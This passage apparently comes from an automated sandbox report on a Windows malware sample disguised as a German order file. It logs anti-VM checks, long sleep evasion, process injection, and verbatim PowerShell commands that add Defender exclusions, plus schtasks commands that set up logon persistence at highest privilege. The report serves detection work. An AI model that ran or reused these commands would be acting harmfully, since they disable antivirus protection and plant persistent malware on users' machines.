                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 31F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 2B50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 2DD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 4DD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 16D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 3070000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 5070000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3953
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4525
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3256
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3659
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Window / User API: threadDelayed 8994
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Window / User API: threadDelayed 788
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5362
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 500
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5736
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 589
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe TID: 3228; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300; Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772; Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1660; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe TID: 2512; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe TID: 3796; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 504; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 3340; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4620; Thread sleep count: 3256 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484; Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4520; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 1872; Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 1160; Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500; Thread sleep count: 5362 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1904; Thread sleep count: 500 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3508; Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4300; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116; Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 636; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe TID: 2300; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe TID: 3352; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                Source: outlooks.exe, 0000000D.00000002.1534984172.000000000153F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: outlooks.exe, 00000016.00000002.3894160572.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3907694103.0000000007761000.00000004.00000020.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3894160572.0000000005C38000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeMemory written: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory written: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMemory written: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /fJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
